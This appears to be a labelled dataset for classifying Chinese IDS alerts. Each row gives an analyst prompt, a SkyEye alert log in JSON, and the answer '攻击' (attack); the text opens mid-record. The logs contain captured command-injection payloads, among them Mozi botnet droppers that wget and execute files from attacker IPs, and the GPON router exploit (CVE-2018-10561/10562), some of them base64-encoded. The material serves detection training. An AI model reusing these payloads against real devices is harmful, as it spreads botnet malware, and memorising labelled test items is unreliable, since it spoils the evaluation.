"file_md5": "", "host": "218.76.15.12:80", "host_state": "失败", "rule_key": "webids", "connection": "keep-alive", "api": "218.76.15.12:80/shell", "first_access_time": "2024-11-27 12:01:23", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "印度", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现系统命令注入行为", "alarm_sip": "172.23.64.208", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "19bae8e14131788bf2935e37e05137f4", "proto": "http", "xff": "", "alarm_id": "20241127_2548835ef3fa6d2b446c2e8ad3ed176d", "vuln_desc": "命令执行攻击是危害极高的攻击形式,一般是服务器代码对用户输入控制不严格导致执行任意命令,也包含攻击者上传了一个后门,通过后门执行了任意命令。", "attack_chain": "0x02010000", "access_time": "2024-11-27 12:01:23", "attack_addr": "印度(19.009570/72.844684)", "type_chain": "16090000", "vuln_harm": "攻击成功可以造成服务器被控制。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732680063", "code_language": "其他", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "103.203.72.158", "public_date": "2018-04-03 17:04:56", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/shell", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "site_app": "其他", "super_attack_chain": "0x02000000", "hit_end": "266", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/shell?cd+/tmp;rm+-rf+*;wget+http://103.203.72.158:55009/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10001384", "req_header": "GET /shell?cd+/tmp;rm+-rf+*;wget+http://103.203.72.158:55009/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1\r\nUser-Agent: Hello, world\r\nHost: 218.76.15.12:80\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection: keep-alive\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "103.203.72.158", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440452-发现系统命令注入行为", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"info\": \"103.203.72.158\", \"port\": \"55009\", \"proto\": \"TCP\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "host_md5": "47cbf35b96a43f8ea77926c9a3fa4d22", "sport": "63607", "h_url": "/shell?cd+/tmp;rm+-rf+*;wget+http://103.203.72.158:55009/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", "user-agent": "Hello, world"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732676484", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "命令执行", "_origin": {"write_date": 1732676484, "vuln_harm": "攻击成功可以造成服务器被控制。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.31.193.222", "site_app": "其他", "hit_end": 18, "uri": "/app/modules/ut-cac/admin/cli.php", "dport": 80, "vuln_name": "发现系统命令注入行为", "rsp_status": 0, "code_language": "其他", "solution": "1.禁掉一些不用的系统命令执行函数。\r\n2.权限控制严格。", "hit_start": 0, "detail_info": "命令执行攻击是危害极高的攻击形式,一般是服务器代码对用户输入控制不严格导致执行任意命令,也包含攻击者上传了一个后门,通过后门执行了任意命令。", "xff": "", "sip": "154.213.187.182", "vuln_desc": "命令执行攻击是危害极高的攻击形式,一般是服务器代码对用户输入控制不严格导致执行任意命令,也包含攻击者上传了一个后门,通过后门执行了任意命令。", "public_date": "2018-04-03 17:04:56", "sport": 45856}, "detail_info": "命令执行攻击是危害极高的攻击形式,一般是服务器代码对用户输入控制不严格导致执行任意命令,也包含攻击者上传了一个后门,通过后门执行了任意命令。", "file_md5": "7fa94a66f27df4f9225562557f6057ff", "rule_key": "webids", "connection": "close", "api": "218.76.15.16/app/modules/ut-cac/admin/cli.php", "first_access_time": "2024-11-27 11:01:24", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--香港特别行政区--中国香港", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现系统命令注入行为", "alarm_sip": "172.31.193.222", "skyeye_index": "", "sip_ioc_dip": "b9a01a391fcd6b1ad13e21697c06e183", "xff": "", "vuln_desc": "命令执行攻击是危害极高的攻击形式,一般是服务器代码对用户输入控制不严格导致执行任意命令,也包含攻击者上传了一个后门,通过后门执行了任意命令。", "attack_chain": "0x02010000", "vuln_harm": "攻击成功可以造成服务器被控制。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732676465", "code_language": "其他", "public_date": "2018-04-03 17:04:56", "skyeye_serial_num": "QbJK/8ze/", "site_app": "其他", "super_attack_chain": "0x02000000", "hit_end": "18", "h_proto_version": "HTTP/1.1", "uri": "/app/modules/ut-cac/admin/cli.php", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10001384", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "154.213.187.182", "host_md5": "5704a8d93ab5f08f2d5f86217a1377f4", "accept-encoding": "gzip, deflate", "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36", "vlan_id": "", "vuln_type": "发现系统命令注入行为", "attack_type": "命令执行", "is_web_attack": "1", "dip": "172.31.193.222", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1.禁掉一些不用的系统命令执行函数。\r\n2.权限控制严格。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvYXBwL21vZHVsZXMvdXQtY2FjL2FkbWluL2NsaS5waHAgSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS4xNg0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTBfMTVfNykgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEyOS4wLjAuMCBTYWZhcmkvNTM3LjM2DQpDb250ZW50LUxlbmd0aDogMzgNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTix6aDtxPTAuOQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KT3JpZ2luOiBodHRwOi8vMjE4Ljc2LjE1LjE2DQpQcmFnbWE6IG5vLWNhY2hlDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQoNCg==", "req_body": "bz13Z2V0IGh0dHA6Ly8xNTQuMjEzLjE4Ny4xODI6MzYzNi9sb2w=", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.16", "host_state": "失败", "cache-control": "no-cache", "accept-language": "zh-CN,zh;q=0.9", "rsp_body": "", "pragma": "no-cache", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_0e36270937f0db2708477d595d0a75bb", "access_time": "2024-11-27 11:01:24", "content-length": "38", "attack_addr": "中国--香港特别行政区--中国香港(22.350617/114.184921)", "type_chain": "16090000", "origin": "http://218.76.15.16", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "154.213.187.182", "dimension": "3", "url_path": "/app/modules/ut-cac/admin/cli.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "cli.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /app/modules/ut-cac/admin/cli.php HTTP/1.1\r\nHost: 218.76.15.16\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36\r\nContent-Length: 38\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: zh-CN,zh;q=0.9\r\nCache-Control: no-cache\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nOrigin: http://218.76.15.16\r\nPragma: no-cache\r\nUpgrade-Insecure-Requests: 1\r\n\r\n", "req_body": "o=wget http://154.213.187.182:3636/lol", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440452-发现系统命令注入行为", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"info\": \"154.213.187.182\", \"port\": \"3636\", \"proto\": \"TCP\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"device\": \"Apple/Mac\", \"os\": \"Mac OS X/10.15\", \"software\": \"Chrome/129.0.0\", \"hw_type\": \"PC\"}}", "sport": "45856", "h_url": "/app/modules/ut-cac/admin/cli.php"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732675874", "vlan_id": "", "vuln_type": "Dasan GPON路由器认证绕过(CVE-2018-10561)", "rule_version_str": "3.0.1122.14572", "attack_type": "非授权访问/权限绕过", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.243", "sip_group": "", "repeat_count": "1", "type": "非授权访问/权限绕过", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732675874, "vuln_harm": "成功利用此漏洞将允许远程攻击者获取敏感信息并获得未经授权访问受影响的系统。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.243", "site_app": "", "hit_end": 30, "uri": "/GponForm/diag_Form?images/", "dport": 80, "vuln_name": "Dasan GPON路由器认证绕过(CVE-2018-10561)", "rsp_status": 0, "code_language": "", "solution": "升级到最新版本", "hit_start": 10, "detail_info": "Dasan GPON路由器中存在认证绕过漏洞。成功利用此漏洞将允许远程攻击者获取敏感信息并获得未经授权访问受影响的系统。", "xff": "", "sip": "117.217.138.79", "vuln_desc": "Dasan GPON路由器中存在认证绕过漏洞。成功利用此漏洞将允许远程攻击者获取敏感信息并获得未经授权访问受影响的系统。", "public_date": "2023-03-31 14:44:03", "sport": 34328}, "solution": "升级到最新版本", "hit_start": "10", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvR3BvbkZvcm0vZGlhZ19Gb3JtP2ltYWdlcy8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMTo4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogSGVsbG8sIFdvcmxkDQpDb250ZW50LUxlbmd0aDogMTE4DQoNCg==", "req_body": "WFdlYlBhZ2VOYW1lPWRpYWcmZGlhZ19hY3Rpb249cGluZyZ3YW5fY29ubGlzdD0wJmRlc3RfaG9zdD1gYDt3Z2V0K2h0dHA6Ly8xMTcuMjE3LjEzOC43OTo1MjczMy9Nb3ppLm0rLU8rLT4vdG1wL2dwb244MDtzaCsvdG1wL2dwb244MCZpcHY9MA==", "rsp_header": "", "rsp_body": ""}, "detail_info": "Dasan GPON路由器中存在认证绕过漏洞。成功利用此漏洞将允许远程攻击者获取敏感信息并获得未经授权访问受影响的系统。", "file_md5": "", "host": "127.0.0.1:80", "host_state": "失败", "rule_key": "webids", "connection": "keep-alive", "api": "127.0.0.1:80/GponForm/diag_Form", "first_access_time": "2024-11-27 10:51:14", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_header", "rsp_body": "", "h_method": "POST", "sip_addr": "印度--卡纳塔克邦--班加罗尔", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Dasan GPON路由器认证绕过(CVE-2018-10561)", "alarm_sip": "172.31.193.243", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "354a5e1be1d6ea6f6067583d5844e3b6", "proto": "http", "xff": "", "alarm_id": "20241127_e32d4a421fa9b5ea3997d322dc61fcfa", "vuln_desc": "Dasan GPON路由器中存在认证绕过漏洞。成功利用此漏洞将允许远程攻击者获取敏感信息并获得未经授权访问受影响的系统。", "attack_chain": "0x02010000", "access_time": "2024-11-27 10:51:14", "content-length": "118", "attack_addr": "印度--卡纳塔克邦--班加罗尔(12.977788/77.607407)", "type_chain": "16040000", "vuln_harm": "成功利用此漏洞将允许远程攻击者获取敏感信息并获得未经授权访问受影响的系统。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732675852", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "117.217.138.79", "public_date": "2023-03-31 14:44:03", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/GponForm/diag_Form", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "30", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/GponForm/diag_Form?images/", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10001397", "req_header": "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nContent-Length: 118\r\n\r\n", "req_body": "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://117.217.138.79:52733/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "117.217.138.79", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440471-Dasan GPON路由器认证绕过(CVE-2018-10561)", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "host_md5": "cef54f47984626c9efbf070c50bfad1b", "sport": "34328", "h_url": "/GponForm/diag_Form?images/", "accept-encoding": "gzip, deflate", "user-agent": "Hello, World"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732675874", "vlan_id": "", "vuln_type": "Dasan GPON路由器认证绕过(CVE-2018-10561)", "rule_version_str": "3.0.1122.14572", "attack_type": "非授权访问/权限绕过", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.243", "sip_group": "", "repeat_count": "1", "type": "非授权访问/权限绕过", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732675874, "vuln_harm": "攻击者可以利用这一漏洞绕过任意终端上的身份验证,从而控制用户的路由设备", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.31.193.243", "site_app": "", "hit_end": 59, "uri": "/GponForm/diag_Form?images/", "dport": 80, "vuln_name": "Dasan GPON路由器认证绕过(CVE-2018-10561)", "rsp_status": 0, "code_language": "", "solution": "检查确认家用网关是否采用GPON,关闭设备对外访问功能。\r\n积极与运营商沟通,获取运营商提供的应对措施。\r\n目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:http://www.dasannetworks.com/en/", "hit_start": 39, "detail_info": "Dasan GPON路由器中存在认证绕过漏洞。成功利用此漏洞将允许远程攻击者获取敏感信息并获得未经授权访问受影响的系统。", "xff": "", "sip": "117.217.138.79", "vuln_desc": "Dasan GPON路由器中存在认证绕过漏洞。成功利用此漏洞将允许远程攻击者获取敏感信息并获得未经授权访问受影响的系统。", "public_date": "2023-03-17 16:11:23", "sport": 34328}, "solution": "检查确认家用网关是否采用GPON,关闭设备对外访问功能。\r\n积极与运营商沟通,获取运营商提供的应对措施。\r\n目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:http://www.dasannetworks.com/en/", "hit_start": "39", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvR3BvbkZvcm0vZGlhZ19Gb3JtP2ltYWdlcy8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMTo4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogSGVsbG8sIFdvcmxkDQpDb250ZW50LUxlbmd0aDogMTE4DQoNCg==", "req_body": "WFdlYlBhZ2VOYW1lPWRpYWcmZGlhZ19hY3Rpb249cGluZyZ3YW5fY29ubGlzdD0wJmRlc3RfaG9zdD1gYDt3Z2V0K2h0dHA6Ly8xMTcuMjE3LjEzOC43OTo1MjczMy9Nb3ppLm0rLU8rLT4vdG1wL2dwb244MDtzaCsvdG1wL2dwb244MCZpcHY9MA==", "rsp_header": "", "rsp_body": ""}, "detail_info": "Dasan GPON路由器中存在认证绕过漏洞。成功利用此漏洞将允许远程攻击者获取敏感信息并获得未经授权访问受影响的系统。", "file_md5": "", "host": "127.0.0.1:80", "host_state": "失败", "rule_key": "webids", "connection": "keep-alive", "api": "127.0.0.1:80/GponForm/diag_Form", "first_access_time": "2024-11-27 10:51:14", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_body", "rsp_body": "", "h_method": "POST", "sip_addr": "印度--卡纳塔克邦--班加罗尔", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Dasan GPON路由器认证绕过(CVE-2018-10561)", "alarm_sip": "172.31.193.243", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "ac82268b203ab7b4bbc06245fc865e95", "proto": "http", "xff": "", "alarm_id": "20241127_55a34f994e7db1f0d66be3332f9eebfa", "vuln_desc": "Dasan GPON路由器中存在认证绕过漏洞。成功利用此漏洞将允许远程攻击者获取敏感信息并获得未经授权访问受影响的系统。", "attack_chain": "0x02010000", "access_time": "2024-11-27 10:51:14", "content-length": "118", "attack_addr": "印度--卡纳塔克邦--班加罗尔(12.977788/77.607407)", "type_chain": "16040000", "vuln_harm": "攻击者可以利用这一漏洞绕过任意终端上的身份验证,从而控制用户的路由设备", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732675852", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "117.217.138.79", "public_date": "2023-03-17 16:11:23", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/GponForm/diag_Form", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "59", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/GponForm/diag_Form?images/", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x100010e9", "req_header": "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nContent-Length: 118\r\n\r\n", "req_body": "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://117.217.138.79:52733/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "117.217.138.79", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268439785-Dasan GPON路由器认证绕过(CVE-2018-10561)", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "host_md5": "cef54f47984626c9efbf070c50bfad1b", "sport": "34328", "h_url": "/GponForm/diag_Form?images/", "accept-encoding": "gzip, deflate", "user-agent": "Hello, World"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732675874", "vlan_id": "", "vuln_type": "GPON光纤路由器越权和远程命令执行漏洞(CVE-2018-10561/CVE-2018-10562)", "rule_version_str": "3.0.1122.14572", "attack_type": "命令执行", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.243", "sip_group": "", "repeat_count": "1", "type": "命令执行", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732675874, "vuln_harm": "这两个漏洞危害高,利用简单,影响数量多。远程攻击者可利用该漏洞提升控制权限,控制整个设备。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.31.193.243", "site_app": "", "hit_end": 59, "uri": "/GponForm/diag_Form?images/", "dport": 80, "vuln_name": "GPON光纤路由器越权和远程命令执行漏洞(CVE-2018-10561/CVE-2018-10562)", "rsp_status": 0, "code_language": "", "solution": "检查确认家用网关是否采用GPON,关闭设备对外访问功能。\r\n积极与运营商沟通,获取运营商提供的应对措施。\r\n目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:http://www.dasannetworks.com/en/", "hit_start": 39, "detail_info": "GPON(Gigabit-Capable PON) 技术是基于ITU-TG.984.x标准的最新一代宽带无源光综合接入标准,具有高带宽,高效率,大覆盖范围,用户接口丰富等众多优点,被大多数运营商视为实现接入网业务宽带化,综合化改造的理想技术。Gpon路由器是现在流行的光纤无光源网络设备,有众多用户使用。网上已经公开两个影响较严重的路由器漏洞:一个是越权访问控制,另一个为远程命令执行漏洞。", "xff": "", "sip": "117.217.138.79", "vuln_desc": "GPON(Gigabit-Capable PON) 技术是基于ITU-TG.984.x标准的最新一代宽带无源光综合接入标准,具有高带宽,高效率,大覆盖范围,用户接口丰富等众多优点,被大多数运营商视为实现接入网业务宽带化,综合化改造的理想技术。Gpon路由器是现在流行的光纤无光源网络设备,有众多用户使用。网上已经公开两个影响较严重的路由器漏洞:一个是越权访问控制,另一个为远程命令执行漏洞。", "public_date": "2023-03-31 14:44:04", "sport": 34328}, "solution": "检查确认家用网关是否采用GPON,关闭设备对外访问功能。\r\n积极与运营商沟通,获取运营商提供的应对措施。\r\n目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:http://www.dasannetworks.com/en/", "hit_start": "39", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvR3BvbkZvcm0vZGlhZ19Gb3JtP2ltYWdlcy8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMTo4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogSGVsbG8sIFdvcmxkDQpDb250ZW50LUxlbmd0aDogMTE4DQoNCg==", "req_body": "WFdlYlBhZ2VOYW1lPWRpYWcmZGlhZ19hY3Rpb249cGluZyZ3YW5fY29ubGlzdD0wJmRlc3RfaG9zdD1gYDt3Z2V0K2h0dHA6Ly8xMTcuMjE3LjEzOC43OTo1MjczMy9Nb3ppLm0rLU8rLT4vdG1wL2dwb244MDtzaCsvdG1wL2dwb244MCZpcHY9MA==", "rsp_header": "", "rsp_body": ""}, "detail_info": "GPON(Gigabit-Capable PON) 技术是基于ITU-TG.984.x标准的最新一代宽带无源光综合接入标准,具有高带宽,高效率,大覆盖范围,用户接口丰富等众多优点,被大多数运营商视为实现接入网业务宽带化,综合化改造的理想技术。Gpon路由器是现在流行的光纤无光源网络设备,有众多用户使用。网上已经公开两个影响较严重的路由器漏洞:一个是越权访问控制,另一个为远程命令执行漏洞。", "file_md5": "", "host": "127.0.0.1:80", "host_state": "失败", "rule_key": "webids", "connection": "keep-alive", "api": "127.0.0.1:80/GponForm/diag_Form", "first_access_time": "2024-11-27 10:51:14", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_body", "rsp_body": "", "h_method": "POST", "sip_addr": "印度--卡纳塔克邦--班加罗尔", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "GPON光纤路由器越权和远程命令执行漏洞(CVE-2018-10561/CVE-2018-10562)", "alarm_sip": "172.31.193.243", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "b7e993c28bc2c90ae8c24e17cc607e78", "proto": "http", "xff": "", "alarm_id": "20241127_1d8adc8b1d698e03b77030702ff8670d", "vuln_desc": "GPON(Gigabit-Capable PON) 技术是基于ITU-TG.984.x标准的最新一代宽带无源光综合接入标准,具有高带宽,高效率,大覆盖范围,用户接口丰富等众多优点,被大多数运营商视为实现接入网业务宽带化,综合化改造的理想技术。Gpon路由器是现在流行的光纤无光源网络设备,有众多用户使用。网上已经公开两个影响较严重的路由器漏洞:一个是越权访问控制,另一个为远程命令执行漏洞。", "attack_chain": "0x02020000", "access_time": "2024-11-27 10:51:14", "content-length": "118", "attack_addr": "印度--卡纳塔克邦--班加罗尔(12.977788/77.607407)", "type_chain": "16090000", "vuln_harm": "这两个漏洞危害高,利用简单,影响数量多。远程攻击者可利用该漏洞提升控制权限,控制整个设备。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732675852", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "117.217.138.79", "public_date": "2023-03-31 14:44:04", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/GponForm/diag_Form", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "59", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/GponForm/diag_Form?images/", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10001398", "req_header": "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nContent-Length: 118\r\n\r\n", "req_body": "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://117.217.138.79:52733/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "117.217.138.79", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440472-GPON光纤路由器越权和远程命令执行漏洞(CVE-2018-10561/CVE-2018-10562)", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"info\": \"117.217.138.79\", \"port\": \"52733\", \"proto\": \"TCP\"}, \"0x100101\": {\"parent_id\": \"0x100100\", \"type\": \"设备类型\", \"name\": \"路由器\", \"parent_name\": \"设备安全\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "host_md5": "cef54f47984626c9efbf070c50bfad1b", "sport": "34328", "h_url": "/GponForm/diag_Form?images/", "accept-encoding": "gzip, deflate", "user-agent": "Hello, World"} | 攻击 |
